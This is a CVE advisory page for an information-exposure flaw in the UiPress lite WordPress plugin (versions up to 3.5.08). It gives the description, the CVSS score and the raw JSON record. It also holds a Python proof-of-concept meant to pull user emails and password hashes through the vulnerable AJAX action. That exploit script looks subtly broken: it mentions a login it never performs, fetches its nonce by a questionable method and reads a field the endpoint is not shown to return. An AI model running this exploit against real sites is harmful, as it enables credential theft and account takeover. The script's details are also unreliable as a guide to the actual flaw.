Security Vulnerability Report
CVE-2025-10938 CVSS 6.5 MEDIUM

CVE-2025-10938

Published: 2025-11-21 08:15:48
Last Modified: 2026-04-15 00:35:42

Description

The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

UiPress lite <= 3.5.08 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-10938 PoC - UiPress lite Sensitive Information Disclosure
# Target: WordPress site with UiPress lite plugin <= 3.5.08
target_url = "http://target-wordpress-site.com"

# Get valid nonce and cookie by logging in as subscriber user
# (Attacker needs subscriber-level access)
login_url = f"{target_url}/wp-login.php"
wpnonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=rest-nonce"

session = requests.Session()

# Step 1: Obtain WordPress nonce
nonce_response = session.get(wpnonce_url)
if nonce_response.status_code == 200:
    nonce = nonce_response.text.strip()
else:
    # Alternative: extract nonce from page source
    # (not implemented here; stop instead of continuing with an undefined nonce)
    raise SystemExit(f"Nonce request failed: {nonce_response.status_code}")

# Step 2: Exploit the vulnerable AJAX endpoint
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Construct malicious request to extract user data
payload = {
    "action": "uip_process_block_query",
    "_wpnonce": nonce,
    "query": {
        "args": {
            "post_type": "user",
            "per_page": 100
        },
        "route": "/wp/v2/users"
    }
}

response = session.post(ajax_endpoint, data=payload)

if response.status_code == 200:
    data = response.json()
    # Extract sensitive user information
    users = data.get("data", {}).get("results", [])
    for user in users:
        print(f"User ID: {user.get('id')}")
        print(f"Email: {user.get('email')}")
        print(f"Password Hash: {user.get('password_hash')}")
        print("---")
else:
    print(f"Request failed: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10938", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:48.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/uipress-lite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8aa06eb-774a-4cd9-bd35-2d6409475696?source=cve", "source": "[email protected]"}]}}